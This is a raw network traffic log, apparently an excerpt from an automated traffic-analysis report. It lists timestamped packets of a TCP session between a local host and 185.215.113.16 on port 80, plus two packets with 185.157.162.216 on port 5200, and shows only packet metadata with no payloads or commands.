Dec 9, 2024 08:08:59.017560005 CET	49886	80	192.168.2.4	185.215.113.16
Dec 9, 2024 08:08:59.018228054 CET	80	49886	185.215.113.16	192.168.2.4
Dec 9, 2024 08:08:59.018439054 CET	80	49886	185.215.113.16	192.168.2.4
Dec 9, 2024 08:08:59.018476963 CET	49886	80	192.168.2.4	185.215.113.16
Dec 9, 2024 08:08:59.019393921 CET	80	49886	185.215.113.16	192.168.2.4
Dec 9, 2024 08:08:59.019593000 CET	80	49886	185.215.113.16	192.168.2.4
Dec 9, 2024 08:08:59.020116091 CET	49886	80	192.168.2.4	185.215.113.16
Dec 9, 2024 08:08:59.020589113 CET	80	49886	185.215.113.16	192.168.2.4
Dec 9, 2024 08:08:59.020817995 CET	80	49886	185.215.113.16	192.168.2.4
Dec 9, 2024 08:08:59.020867109 CET	49886	80	192.168.2.4	185.215.113.16
Dec 9, 2024 08:08:59.021869898 CET	80	49886	185.215.113.16	192.168.2.4
Dec 9, 2024 08:08:59.022042036 CET	80	49886	185.215.113.16	192.168.2.4
Dec 9, 2024 08:08:59.022085905 CET	49886	80	192.168.2.4	185.215.113.16
Dec 9, 2024 08:08:59.023102999 CET	80	49886	185.215.113.16	192.168.2.4
Dec 9, 2024 08:08:59.023250103 CET	80	49886	185.215.113.16	192.168.2.4
Dec 9, 2024 08:08:59.023338079 CET	49886	80	192.168.2.4	185.215.113.16
Dec 9, 2024 08:08:59.024291039 CET	80	49886	185.215.113.16	192.168.2.4
Dec 9, 2024 08:08:59.024399996 CET	80	49886	185.215.113.16	192.168.2.4
Dec 9, 2024 08:08:59.024446964 CET	49886	80	192.168.2.4	185.215.113.16
Dec 9, 2024 08:08:59.025332928 CET	80	49886	185.215.113.16	192.168.2.4
Dec 9, 2024 08:08:59.025504112 CET	80	49886	185.215.113.16	192.168.2.4
Dec 9, 2024 08:08:59.026287079 CET	49886	80	192.168.2.4	185.215.113.16
Dec 9, 2024 08:08:59.026540995 CET	80	49886	185.215.113.16	192.168.2.4
Dec 9, 2024 08:08:59.026731968 CET	80	49886	185.215.113.16	192.168.2.4
Dec 9, 2024 08:08:59.026788950 CET	49886	80	192.168.2.4	185.215.113.16
Dec 9, 2024 08:08:59.027687073 CET	80	49886	185.215.113.16	192.168.2.4
Dec 9, 2024 08:08:59.027924061 CET	80	49886	185.215.113.16	192.168.2.4
Dec 9, 2024 08:08:59.027960062 CET	49886	80	192.168.2.4	185.215.113.16
Dec 9, 2024 08:08:59.028893948 CET	80	49886	185.215.113.16	192.168.2.4
Dec 9, 2024 08:08:59.029071093 CET	80	49886	185.215.113.16	192.168.2.4
Dec 9, 2024 08:08:59.029110909 CET	49886	80	192.168.2.4	185.215.113.16
Dec 9, 2024 08:08:59.030075073 CET	80	49886	185.215.113.16	192.168.2.4
Dec 9, 2024 08:08:59.030270100 CET	80	49886	185.215.113.16	192.168.2.4
Dec 9, 2024 08:08:59.030319929 CET	49886	80	192.168.2.4	185.215.113.16
Dec 9, 2024 08:08:59.031215906 CET	80	49886	185.215.113.16	192.168.2.4
Dec 9, 2024 08:08:59.031466961 CET	80	49886	185.215.113.16	192.168.2.4
Dec 9, 2024 08:08:59.031516075 CET	49886	80	192.168.2.4	185.215.113.16
Dec 9, 2024 08:08:59.031713963 CET	80	49886	185.215.113.16	192.168.2.4
Dec 9, 2024 08:08:59.032659054 CET	80	49886	185.215.113.16	192.168.2.4
Dec 9, 2024 08:08:59.032862902 CET	80	49886	185.215.113.16	192.168.2.4
Dec 9, 2024 08:08:59.032913923 CET	49886	80	192.168.2.4	185.215.113.16
Dec 9, 2024 08:08:59.033829927 CET	80	49886	185.215.113.16	192.168.2.4
Dec 9, 2024 08:08:59.034041882 CET	80	49886	185.215.113.16	192.168.2.4
Dec 9, 2024 08:08:59.034084082 CET	49886	80	192.168.2.4	185.215.113.16
Dec 9, 2024 08:08:59.035051107 CET	80	49886	185.215.113.16	192.168.2.4
Dec 9, 2024 08:08:59.035089970 CET	49886	80	192.168.2.4	185.215.113.16
Dec 9, 2024 08:08:59.035208941 CET	80	49886	185.215.113.16	192.168.2.4
Dec 9, 2024 08:08:59.036206007 CET	80	49886	185.215.113.16	192.168.2.4
Dec 9, 2024 08:08:59.036252022 CET	49886	80	192.168.2.4	185.215.113.16
Dec 9, 2024 08:08:59.036407948 CET	80	49886	185.215.113.16	192.168.2.4
Dec 9, 2024 08:08:59.037406921 CET	80	49886	185.215.113.16	192.168.2.4
Dec 9, 2024 08:08:59.037604094 CET	80	49886	185.215.113.16	192.168.2.4
Dec 9, 2024 08:08:59.037640095 CET	49886	80	192.168.2.4	185.215.113.16
Dec 9, 2024 08:08:59.038589001 CET	80	49886	185.215.113.16	192.168.2.4
Dec 9, 2024 08:08:59.038769960 CET	80	49886	185.215.113.16	192.168.2.4
Dec 9, 2024 08:08:59.038819075 CET	49886	80	192.168.2.4	185.215.113.16
Dec 9, 2024 08:08:59.039788008 CET	80	49886	185.215.113.16	192.168.2.4
Dec 9, 2024 08:08:59.039971113 CET	80	49886	185.215.113.16	192.168.2.4
Dec 9, 2024 08:08:59.040019989 CET	49886	80	192.168.2.4	185.215.113.16
Dec 9, 2024 08:08:59.040950060 CET	80	49886	185.215.113.16	192.168.2.4
Dec 9, 2024 08:08:59.040997028 CET	49886	80	192.168.2.4	185.215.113.16
Dec 9, 2024 08:08:59.041121960 CET	80	49886	185.215.113.16	192.168.2.4
Dec 9, 2024 08:08:59.042131901 CET	80	49886	185.215.113.16	192.168.2.4
Dec 9, 2024 08:08:59.042176962 CET	49886	80	192.168.2.4	185.215.113.16
Dec 9, 2024 08:08:59.042325974 CET	80	49886	185.215.113.16	192.168.2.4
Dec 9, 2024 08:08:59.043390036 CET	80	49886	185.215.113.16	192.168.2.4
Dec 9, 2024 08:08:59.043431044 CET	49886	80	192.168.2.4	185.215.113.16
Dec 9, 2024 08:08:59.043513060 CET	80	49886	185.215.113.16	192.168.2.4
Dec 9, 2024 08:08:59.044497013 CET	80	49886	185.215.113.16	192.168.2.4
Dec 9, 2024 08:08:59.044636965 CET	49886	80	192.168.2.4	185.215.113.16
Dec 9, 2024 08:08:59.044683933 CET	80	49886	185.215.113.16	192.168.2.4
Dec 9, 2024 08:08:59.045671940 CET	80	49886	185.215.113.16	192.168.2.4
Dec 9, 2024 08:08:59.045891047 CET	80	49886	185.215.113.16	192.168.2.4
Dec 9, 2024 08:08:59.045934916 CET	49886	80	192.168.2.4	185.215.113.16
Dec 9, 2024 08:08:59.046853065 CET	80	49886	185.215.113.16	192.168.2.4
Dec 9, 2024 08:08:59.047039032 CET	80	49886	185.215.113.16	192.168.2.4
Dec 9, 2024 08:08:59.047075033 CET	49886	80	192.168.2.4	185.215.113.16
Dec 9, 2024 08:08:59.048058033 CET	80	49886	185.215.113.16	192.168.2.4
Dec 9, 2024 08:08:59.048100948 CET	49886	80	192.168.2.4	185.215.113.16
Dec 9, 2024 08:08:59.048223019 CET	80	49886	185.215.113.16	192.168.2.4
Dec 9, 2024 08:08:59.049223900 CET	80	49886	185.215.113.16	192.168.2.4
Dec 9, 2024 08:08:59.049268007 CET	49886	80	192.168.2.4	185.215.113.16
Dec 9, 2024 08:08:59.049413919 CET	80	49886	185.215.113.16	192.168.2.4
Dec 9, 2024 08:08:59.050388098 CET	80	49886	185.215.113.16	192.168.2.4
Dec 9, 2024 08:08:59.050436020 CET	49886	80	192.168.2.4	185.215.113.16
Dec 9, 2024 08:08:59.050581932 CET	80	49886	185.215.113.16	192.168.2.4
Dec 9, 2024 08:08:59.051579952 CET	80	49886	185.215.113.16	192.168.2.4
Dec 9, 2024 08:08:59.051623106 CET	49886	80	192.168.2.4	185.215.113.16
Dec 9, 2024 08:08:59.051769018 CET	80	49886	185.215.113.16	192.168.2.4
Dec 9, 2024 08:08:59.052766085 CET	80	49886	185.215.113.16	192.168.2.4
Dec 9, 2024 08:08:59.052961111 CET	80	49886	185.215.113.16	192.168.2.4
Dec 9, 2024 08:08:59.053011894 CET	49886	80	192.168.2.4	185.215.113.16
Dec 9, 2024 08:08:59.053950071 CET	80	49886	185.215.113.16	192.168.2.4
Dec 9, 2024 08:08:59.054148912 CET	80	49886	185.215.113.16	192.168.2.4
Dec 9, 2024 08:08:59.054200888 CET	49886	80	192.168.2.4	185.215.113.16
Dec 9, 2024 08:08:59.055203915 CET	80	49886	185.215.113.16	192.168.2.4
Dec 9, 2024 08:08:59.055385113 CET	80	49886	185.215.113.16	192.168.2.4
Dec 9, 2024 08:08:59.055437088 CET	49886	80	192.168.2.4	185.215.113.16
Dec 9, 2024 08:08:59.056323051 CET	80	49886	185.215.113.16	192.168.2.4
Dec 9, 2024 08:08:59.056369066 CET	49886	80	192.168.2.4	185.215.113.16
Dec 9, 2024 08:08:59.056538105 CET	80	49886	185.215.113.16	192.168.2.4
Dec 9, 2024 08:08:59.057531118 CET	80	49886	185.215.113.16	192.168.2.4
Dec 9, 2024 08:08:59.057590961 CET	49886	80	192.168.2.4	185.215.113.16
Dec 9, 2024 08:08:59.057722092 CET	80	49886	185.215.113.16	192.168.2.4
Dec 9, 2024 08:08:59.058689117 CET	80	49886	185.215.113.16	192.168.2.4
Dec 9, 2024 08:08:59.058743000 CET	49886	80	192.168.2.4	185.215.113.16
Dec 9, 2024 08:08:59.058881044 CET	80	49886	185.215.113.16	192.168.2.4
Dec 9, 2024 08:08:59.059870005 CET	80	49886	185.215.113.16	192.168.2.4
Dec 9, 2024 08:08:59.059920073 CET	49886	80	192.168.2.4	185.215.113.16
Dec 9, 2024 08:08:59.060080051 CET	80	49886	185.215.113.16	192.168.2.4
Dec 9, 2024 08:08:59.061058044 CET	80	49886	185.215.113.16	192.168.2.4
Dec 9, 2024 08:08:59.061109066 CET	49886	80	192.168.2.4	185.215.113.16
Dec 9, 2024 08:08:59.061263084 CET	80	49886	185.215.113.16	192.168.2.4
Dec 9, 2024 08:08:59.062267065 CET	80	49886	185.215.113.16	192.168.2.4
Dec 9, 2024 08:08:59.062306881 CET	49886	80	192.168.2.4	185.215.113.16
Dec 9, 2024 08:08:59.062443018 CET	80	49886	185.215.113.16	192.168.2.4
Dec 9, 2024 08:08:59.063419104 CET	80	49886	185.215.113.16	192.168.2.4
Dec 9, 2024 08:08:59.063458920 CET	49886	80	192.168.2.4	185.215.113.16
Dec 9, 2024 08:08:59.063632011 CET	80	49886	185.215.113.16	192.168.2.4
Dec 9, 2024 08:08:59.064609051 CET	80	49886	185.215.113.16	192.168.2.4
Dec 9, 2024 08:08:59.064810991 CET	80	49886	185.215.113.16	192.168.2.4
Dec 9, 2024 08:08:59.064862967 CET	49886	80	192.168.2.4	185.215.113.16
Dec 9, 2024 08:08:59.065798044 CET	80	49886	185.215.113.16	192.168.2.4
Dec 9, 2024 08:08:59.065990925 CET	80	49886	185.215.113.16	192.168.2.4
Dec 9, 2024 08:08:59.066041946 CET	49886	80	192.168.2.4	185.215.113.16
Dec 9, 2024 08:08:59.066975117 CET	80	49886	185.215.113.16	192.168.2.4
Dec 9, 2024 08:08:59.067022085 CET	49886	80	192.168.2.4	185.215.113.16
Dec 9, 2024 08:08:59.067164898 CET	80	49886	185.215.113.16	192.168.2.4
Dec 9, 2024 08:08:59.068172932 CET	80	49886	185.215.113.16	192.168.2.4
Dec 9, 2024 08:08:59.068222046 CET	49886	80	192.168.2.4	185.215.113.16
Dec 9, 2024 08:08:59.068352938 CET	80	49886	185.215.113.16	192.168.2.4
Dec 9, 2024 08:08:59.069364071 CET	80	49886	185.215.113.16	192.168.2.4
Dec 9, 2024 08:08:59.069415092 CET	49886	80	192.168.2.4	185.215.113.16
Dec 9, 2024 08:08:59.069550037 CET	80	49886	185.215.113.16	192.168.2.4
Dec 9, 2024 08:08:59.070523024 CET	80	49886	185.215.113.16	192.168.2.4
Dec 9, 2024 08:08:59.070564032 CET	49886	80	192.168.2.4	185.215.113.16
Dec 9, 2024 08:08:59.070713043 CET	80	49886	185.215.113.16	192.168.2.4
Dec 9, 2024 08:08:59.071713924 CET	80	49886	185.215.113.16	192.168.2.4
Dec 9, 2024 08:08:59.071748972 CET	49886	80	192.168.2.4	185.215.113.16
Dec 9, 2024 08:08:59.071894884 CET	80	49886	185.215.113.16	192.168.2.4
Dec 9, 2024 08:08:59.072907925 CET	80	49886	185.215.113.16	192.168.2.4
Dec 9, 2024 08:08:59.072946072 CET	49886	80	192.168.2.4	185.215.113.16
Dec 9, 2024 08:08:59.073088884 CET	80	49886	185.215.113.16	192.168.2.4
Dec 9, 2024 08:08:59.074069023 CET	80	49886	185.215.113.16	192.168.2.4
Dec 9, 2024 08:08:59.074116945 CET	49886	80	192.168.2.4	185.215.113.16
Dec 9, 2024 08:08:59.074274063 CET	80	49886	185.215.113.16	192.168.2.4
Dec 9, 2024 08:08:59.075259924 CET	80	49886	185.215.113.16	192.168.2.4
Dec 9, 2024 08:08:59.075320005 CET	49886	80	192.168.2.4	185.215.113.16
Dec 9, 2024 08:08:59.075474024 CET	80	49886	185.215.113.16	192.168.2.4
Dec 9, 2024 08:08:59.076437950 CET	80	49886	185.215.113.16	192.168.2.4
Dec 9, 2024 08:08:59.076497078 CET	49886	80	192.168.2.4	185.215.113.16
Dec 9, 2024 08:08:59.076623917 CET	80	49886	185.215.113.16	192.168.2.4
Dec 9, 2024 08:08:59.077121973 CET	5200	49888	185.157.162.216	192.168.2.4
Dec 9, 2024 08:08:59.077611923 CET	80	49886	185.215.113.16	192.168.2.4
Dec 9, 2024 08:08:59.077658892 CET	49886	80	192.168.2.4	185.215.113.16
Dec 9, 2024 08:08:59.077817917 CET	80	49886	185.215.113.16	192.168.2.4
Dec 9, 2024 08:08:59.078799963 CET	80	49886	185.215.113.16	192.168.2.4
Dec 9, 2024 08:08:59.079006910 CET	80	49886	185.215.113.16	192.168.2.4
Dec 9, 2024 08:08:59.079051971 CET	49886	80	192.168.2.4	185.215.113.16
Dec 9, 2024 08:08:59.080004930 CET	80	49886	185.215.113.16	192.168.2.4
Dec 9, 2024 08:08:59.080113888 CET	49886	80	192.168.2.4	185.215.113.16
Dec 9, 2024 08:08:59.080192089 CET	80	49886	185.215.113.16	192.168.2.4
Dec 9, 2024 08:08:59.081186056 CET	80	49886	185.215.113.16	192.168.2.4
Dec 9, 2024 08:08:59.081228018 CET	49886	80	192.168.2.4	185.215.113.16
Dec 9, 2024 08:08:59.081381083 CET	80	49886	185.215.113.16	192.168.2.4
Dec 9, 2024 08:08:59.082346916 CET	80	49886	185.215.113.16	192.168.2.4
Dec 9, 2024 08:08:59.082407951 CET	49886	80	192.168.2.4	185.215.113.16
Dec 9, 2024 08:08:59.082549095 CET	80	49886	185.215.113.16	192.168.2.4
Dec 9, 2024 08:08:59.083592892 CET	80	49886	185.215.113.16	192.168.2.4
Dec 9, 2024 08:08:59.083642960 CET	49886	80	192.168.2.4	185.215.113.16
Dec 9, 2024 08:08:59.083712101 CET	80	49886	185.215.113.16	192.168.2.4
Dec 9, 2024 08:08:59.084718943 CET	80	49886	185.215.113.16	192.168.2.4
Dec 9, 2024 08:08:59.084907055 CET	80	49886	185.215.113.16	192.168.2.4
Dec 9, 2024 08:08:59.084945917 CET	49886	80	192.168.2.4	185.215.113.16
Dec 9, 2024 08:08:59.085911989 CET	80	49886	185.215.113.16	192.168.2.4
Dec 9, 2024 08:08:59.086117029 CET	80	49886	185.215.113.16	192.168.2.4
Dec 9, 2024 08:08:59.086127043 CET	49886	80	192.168.2.4	185.215.113.16
Dec 9, 2024 08:08:59.087183952 CET	80	49886	185.215.113.16	192.168.2.4
Dec 9, 2024 08:08:59.087224960 CET	49886	80	192.168.2.4	185.215.113.16
Dec 9, 2024 08:08:59.087356091 CET	80	49886	185.215.113.16	192.168.2.4
Dec 9, 2024 08:08:59.088289022 CET	80	49886	185.215.113.16	192.168.2.4
Dec 9, 2024 08:08:59.088473082 CET	80	49886	185.215.113.16	192.168.2.4
Dec 9, 2024 08:08:59.088524103 CET	49886	80	192.168.2.4	185.215.113.16
Dec 9, 2024 08:08:59.089469910 CET	80	49886	185.215.113.16	192.168.2.4
Dec 9, 2024 08:08:59.089684010 CET	80	49886	185.215.113.16	192.168.2.4
Dec 9, 2024 08:08:59.089741945 CET	49886	80	192.168.2.4	185.215.113.16
Dec 9, 2024 08:08:59.090636969 CET	80	49886	185.215.113.16	192.168.2.4
Dec 9, 2024 08:08:59.090837955 CET	80	49886	185.215.113.16	192.168.2.4
Dec 9, 2024 08:08:59.090895891 CET	49886	80	192.168.2.4	185.215.113.16
Dec 9, 2024 08:08:59.091819048 CET	80	49886	185.215.113.16	192.168.2.4
Dec 9, 2024 08:08:59.092010975 CET	80	49886	185.215.113.16	192.168.2.4
Dec 9, 2024 08:08:59.092060089 CET	49886	80	192.168.2.4	185.215.113.16
Dec 9, 2024 08:08:59.093008995 CET	80	49886	185.215.113.16	192.168.2.4
Dec 9, 2024 08:08:59.093266964 CET	80	49886	185.215.113.16	192.168.2.4
Dec 9, 2024 08:08:59.093317986 CET	49886	80	192.168.2.4	185.215.113.16
Dec 9, 2024 08:08:59.094201088 CET	80	49886	185.215.113.16	192.168.2.4
Dec 9, 2024 08:08:59.094247103 CET	49886	80	192.168.2.4	185.215.113.16
Dec 9, 2024 08:08:59.094412088 CET	80	49886	185.215.113.16	192.168.2.4
Dec 9, 2024 08:08:59.095499039 CET	80	49886	185.215.113.16	192.168.2.4
Dec 9, 2024 08:08:59.095549107 CET	49886	80	192.168.2.4	185.215.113.16
Dec 9, 2024 08:08:59.095710039 CET	80	49886	185.215.113.16	192.168.2.4
Dec 9, 2024 08:08:59.096579075 CET	80	49886	185.215.113.16	192.168.2.4
Dec 9, 2024 08:08:59.096767902 CET	80	49886	185.215.113.16	192.168.2.4
Dec 9, 2024 08:08:59.096769094 CET	49886	80	192.168.2.4	185.215.113.16
Dec 9, 2024 08:08:59.097738981 CET	80	49886	185.215.113.16	192.168.2.4
Dec 9, 2024 08:08:59.097795963 CET	49886	80	192.168.2.4	185.215.113.16
Dec 9, 2024 08:08:59.097928047 CET	80	49886	185.215.113.16	192.168.2.4
Dec 9, 2024 08:08:59.098931074 CET	80	49886	185.215.113.16	192.168.2.4
Dec 9, 2024 08:08:59.098974943 CET	49886	80	192.168.2.4	185.215.113.16
Dec 9, 2024 08:08:59.099133968 CET	80	49886	185.215.113.16	192.168.2.4
Dec 9, 2024 08:08:59.100096941 CET	80	49886	185.215.113.16	192.168.2.4
Dec 9, 2024 08:08:59.100137949 CET	49886	80	192.168.2.4	185.215.113.16
Dec 9, 2024 08:08:59.100291967 CET	80	49886	185.215.113.16	192.168.2.4
Dec 9, 2024 08:08:59.101298094 CET	80	49886	185.215.113.16	192.168.2.4
Dec 9, 2024 08:08:59.101341963 CET	49886	80	192.168.2.4	185.215.113.16
Dec 9, 2024 08:08:59.101475954 CET	80	49886	185.215.113.16	192.168.2.4
Dec 9, 2024 08:08:59.102525949 CET	80	49886	185.215.113.16	192.168.2.4
Dec 9, 2024 08:08:59.102571011 CET	49886	80	192.168.2.4	185.215.113.16
Dec 9, 2024 08:08:59.102694988 CET	80	49886	185.215.113.16	192.168.2.4
Dec 9, 2024 08:08:59.103669882 CET	80	49886	185.215.113.16	192.168.2.4
Dec 9, 2024 08:08:59.103707075 CET	49886	80	192.168.2.4	185.215.113.16
Dec 9, 2024 08:08:59.103868008 CET	80	49886	185.215.113.16	192.168.2.4
Dec 9, 2024 08:08:59.104907036 CET	80	49886	185.215.113.16	192.168.2.4
Dec 9, 2024 08:08:59.105094910 CET	80	49886	185.215.113.16	192.168.2.4
Dec 9, 2024 08:08:59.105134964 CET	49886	80	192.168.2.4	185.215.113.16
Dec 9, 2024 08:08:59.106024981 CET	80	49886	185.215.113.16	192.168.2.4
Dec 9, 2024 08:08:59.106117010 CET	49886	80	192.168.2.4	185.215.113.16
Dec 9, 2024 08:08:59.106208086 CET	80	49886	185.215.113.16	192.168.2.4
Dec 9, 2024 08:08:59.107208014 CET	80	49886	185.215.113.16	192.168.2.4
Dec 9, 2024 08:08:59.107249975 CET	49886	80	192.168.2.4	185.215.113.16
Dec 9, 2024 08:08:59.107407093 CET	80	49886	185.215.113.16	192.168.2.4
Dec 9, 2024 08:08:59.108443975 CET	80	49886	185.215.113.16	192.168.2.4
Dec 9, 2024 08:08:59.108572960 CET	49886	80	192.168.2.4	185.215.113.16
Dec 9, 2024 08:08:59.108654022 CET	80	49886	185.215.113.16	192.168.2.4
Dec 9, 2024 08:08:59.109587908 CET	80	49886	185.215.113.16	192.168.2.4
Dec 9, 2024 08:08:59.109783888 CET	80	49886	185.215.113.16	192.168.2.4
Dec 9, 2024 08:08:59.109833002 CET	49886	80	192.168.2.4	185.215.113.16
Dec 9, 2024 08:08:59.110744953 CET	80	49886	185.215.113.16	192.168.2.4
Dec 9, 2024 08:08:59.110944986 CET	80	49886	185.215.113.16	192.168.2.4
Dec 9, 2024 08:08:59.111001968 CET	49886	80	192.168.2.4	185.215.113.16
Dec 9, 2024 08:08:59.111937046 CET	80	49886	185.215.113.16	192.168.2.4
Dec 9, 2024 08:08:59.112132072 CET	80	49886	185.215.113.16	192.168.2.4
Dec 9, 2024 08:08:59.112170935 CET	49886	80	192.168.2.4	185.215.113.16
Dec 9, 2024 08:08:59.113132000 CET	80	49886	185.215.113.16	192.168.2.4
Dec 9, 2024 08:08:59.113313913 CET	80	49886	185.215.113.16	192.168.2.4
Dec 9, 2024 08:08:59.113333941 CET	49886	80	192.168.2.4	185.215.113.16
Dec 9, 2024 08:08:59.114309072 CET	80	49886	185.215.113.16	192.168.2.4
Dec 9, 2024 08:08:59.114500046 CET	80	49886	185.215.113.16	192.168.2.4
Dec 9, 2024 08:08:59.114548922 CET	49886	80	192.168.2.4	185.215.113.16
Dec 9, 2024 08:08:59.115547895 CET	80	49886	185.215.113.16	192.168.2.4
Dec 9, 2024 08:08:59.115695000 CET	80	49886	185.215.113.16	192.168.2.4
Dec 9, 2024 08:08:59.115736008 CET	49886	80	192.168.2.4	185.215.113.16
Dec 9, 2024 08:08:59.116688013 CET	80	49886	185.215.113.16	192.168.2.4
Dec 9, 2024 08:08:59.116736889 CET	49886	80	192.168.2.4	185.215.113.16
Dec 9, 2024 08:08:59.116873980 CET	80	49886	185.215.113.16	192.168.2.4
Dec 9, 2024 08:08:59.117851019 CET	80	49886	185.215.113.16	192.168.2.4
Dec 9, 2024 08:08:59.117906094 CET	49886	80	192.168.2.4	185.215.113.16
Dec 9, 2024 08:08:59.118048906 CET	80	49886	185.215.113.16	192.168.2.4
Dec 9, 2024 08:08:59.119055033 CET	80	49886	185.215.113.16	192.168.2.4
Dec 9, 2024 08:08:59.119093895 CET	49886	80	192.168.2.4	185.215.113.16
Dec 9, 2024 08:08:59.119235992 CET	80	49886	185.215.113.16	192.168.2.4
Dec 9, 2024 08:08:59.120260000 CET	80	49886	185.215.113.16	192.168.2.4
Dec 9, 2024 08:08:59.120301962 CET	49886	80	192.168.2.4	185.215.113.16
Dec 9, 2024 08:08:59.120445013 CET	80	49886	185.215.113.16	192.168.2.4
Dec 9, 2024 08:08:59.121421099 CET	80	49886	185.215.113.16	192.168.2.4
Dec 9, 2024 08:08:59.121490955 CET	49886	80	192.168.2.4	185.215.113.16
Dec 9, 2024 08:08:59.121603012 CET	80	49886	185.215.113.16	192.168.2.4
Dec 9, 2024 08:08:59.122600079 CET	80	49886	185.215.113.16	192.168.2.4
Dec 9, 2024 08:08:59.122636080 CET	49886	80	192.168.2.4	185.215.113.16
Dec 9, 2024 08:08:59.122803926 CET	80	49886	185.215.113.16	192.168.2.4
Dec 9, 2024 08:08:59.123790979 CET	80	49886	185.215.113.16	192.168.2.4
Dec 9, 2024 08:08:59.123828888 CET	49886	80	192.168.2.4	185.215.113.16
Dec 9, 2024 08:08:59.124000072 CET	80	49886	185.215.113.16	192.168.2.4
Dec 9, 2024 08:08:59.124950886 CET	80	49886	185.215.113.16	192.168.2.4
Dec 9, 2024 08:08:59.125010967 CET	49886	80	192.168.2.4	185.215.113.16
Dec 9, 2024 08:08:59.125189066 CET	80	49886	185.215.113.16	192.168.2.4
Dec 9, 2024 08:08:59.125822067 CET	49888	5200	192.168.2.4	185.157.162.216
Dec 9, 2024 08:08:59.126167059 CET	80	49886	185.215.113.16	192.168.2.4
Dec 9, 2024 08:08:59.126332045 CET	49886	80	192.168.2.4	185.215.113.16
Dec 9, 2024 08:08:59.126359940 CET	80	49886	185.215.113.16	192.168.2.4
Dec 9, 2024 08:08:59.127341032 CET	80	49886	185.215.113.16	192.168.2.4
Dec 9, 2024 08:08:59.127392054 CET	49886	80	192.168.2.4	185.215.113.16
Dec 9, 2024 08:08:59.127541065 CET	80	49886	185.215.113.16	192.168.2.4
Dec 9, 2024 08:08:59.128515959 CET	80	49886	185.215.113.16	192.168.2.4
Dec 9, 2024 08:08:59.128705978 CET	49886	80	192.168.2.4	185.215.113.16
Dec 9, 2024 08:08:59.128710032 CET	80	49886	185.215.113.16	192.168.2.4
Dec 9, 2024 08:08:59.129697084 CET	80	49886	185.215.113.16	192.168.2.4
Dec 9, 2024 08:08:59.129736900 CET	49886	80	192.168.2.4	185.215.113.16
Dec 9, 2024 08:08:59.129893064 CET	80	49886	185.215.113.16	192.168.2.4
Dec 9, 2024 08:08:59.130887032 CET	80	49886	185.215.113.16	192.168.2.4
Dec 9, 2024 08:08:59.130934000 CET	49886	80	192.168.2.4	185.215.113.16
Dec 9, 2024 08:08:59.131127119 CET	80	49886	185.215.113.16	192.168.2.4
Dec 9, 2024 08:08:59.132132053 CET	80	49886	185.215.113.16	192.168.2.4
Dec 9, 2024 08:08:59.132184029 CET	49886	80	192.168.2.4	185.215.113.16
Dec 9, 2024 08:08:59.132323027 CET	80	49886	185.215.113.16	192.168.2.4
Dec 9, 2024 08:08:59.133289099 CET	80	49886	185.215.113.16	192.168.2.4
Dec 9, 2024 08:08:59.133492947 CET	80	49886	185.215.113.16	192.168.2.4
Dec 9, 2024 08:08:59.133536100 CET	49886	80	192.168.2.4	185.215.113.16
Dec 9, 2024 08:08:59.134465933 CET	80	49886	185.215.113.16	192.168.2.4
Dec 9, 2024 08:08:59.134510994 CET	49886	80	192.168.2.4	185.215.113.16
Dec 9, 2024 08:08:59.134643078 CET	80	49886	185.215.113.16	192.168.2.4
Dec 9, 2024 08:08:59.135647058 CET	80	49886	185.215.113.16	192.168.2.4
Dec 9, 2024 08:08:59.135696888 CET	49886	80	192.168.2.4	185.215.113.16
Dec 9, 2024 08:08:59.135868073 CET	80	49886	185.215.113.16	192.168.2.4
Dec 9, 2024 08:08:59.136820078 CET	80	49886	185.215.113.16	192.168.2.4
Dec 9, 2024 08:08:59.136858940 CET	49886	80	192.168.2.4	185.215.113.16
Dec 9, 2024 08:08:59.137033939 CET	80	49886	185.215.113.16	192.168.2.4
Dec 9, 2024 08:08:59.137990952 CET	80	49886	185.215.113.16	192.168.2.4
Dec 9, 2024 08:08:59.138039112 CET	49886	80	192.168.2.4	185.215.113.16
Dec 9, 2024 08:08:59.138185978 CET	80	49886	185.215.113.16	192.168.2.4
Dec 9, 2024 08:08:59.139183998 CET	80	49886	185.215.113.16	192.168.2.4
Dec 9, 2024 08:08:59.139234066 CET	49886	80	192.168.2.4	185.215.113.16
Dec 9, 2024 08:08:59.139384031 CET	80	49886	185.215.113.16	192.168.2.4
Dec 9, 2024 08:08:59.140358925 CET	80	49886	185.215.113.16	192.168.2.4
Dec 9, 2024 08:08:59.140402079 CET	49886	80	192.168.2.4	185.215.113.16
Dec 9, 2024 08:08:59.140558004 CET	80	49886	185.215.113.16	192.168.2.4
Dec 9, 2024 08:08:59.141556978 CET	80	49886	185.215.113.16	192.168.2.4
Dec 9, 2024 08:08:59.141660929 CET	49886	80	192.168.2.4	185.215.113.16
Dec 9, 2024 08:08:59.141741991 CET	80	49886	185.215.113.16	192.168.2.4
Dec 9, 2024 08:08:59.142709970 CET	80	49886	185.215.113.16	192.168.2.4
Dec 9, 2024 08:08:59.142915964 CET	80	49886	185.215.113.16	192.168.2.4
Dec 9, 2024 08:08:59.142977953 CET	49886	80	192.168.2.4	185.215.113.16
Dec 9, 2024 08:08:59.143901110 CET	80	49886	185.215.113.16	192.168.2.4
Dec 9, 2024 08:08:59.143939018 CET	49886	80	192.168.2.4	185.215.113.16
Dec 9, 2024 08:08:59.144104958 CET	80	49886	185.215.113.16	192.168.2.4
Dec 9, 2024 08:08:59.145095110 CET	80	49886	185.215.113.16	192.168.2.4
Dec 9, 2024 08:08:59.145138025 CET	49886	80	192.168.2.4	185.215.113.16
Dec 9, 2024 08:08:59.145333052 CET	80	49886	185.215.113.16	192.168.2.4
Dec 9, 2024 08:08:59.146281004 CET	80	49886	185.215.113.16	192.168.2.4
Dec 9, 2024 08:08:59.146323919 CET	49886	80	192.168.2.4	185.215.113.16
Dec 9, 2024 08:08:59.146596909 CET	80	49886	185.215.113.16	192.168.2.4
Dec 9, 2024 08:08:59.147468090 CET	80	49886	185.215.113.16	192.168.2.4
Dec 9, 2024 08:08:59.147506952 CET	49886	80	192.168.2.4	185.215.113.16
Dec 9, 2024 08:08:59.147677898 CET	80	49886	185.215.113.16	192.168.2.4
Dec 9, 2024 08:08:59.148705959 CET	80	49886	185.215.113.16	192.168.2.4
Dec 9, 2024 08:08:59.148756027 CET	49886	80	192.168.2.4	185.215.113.16
Dec 9, 2024 08:08:59.148879051 CET	80	49886	185.215.113.16	192.168.2.4
Dec 9, 2024 08:08:59.149858952 CET	80	49886	185.215.113.16	192.168.2.4
Dec 9, 2024 08:08:59.150078058 CET	80	49886	185.215.113.16	192.168.2.4
Dec 9, 2024 08:08:59.150122881 CET	49886	80	192.168.2.4	185.215.113.16
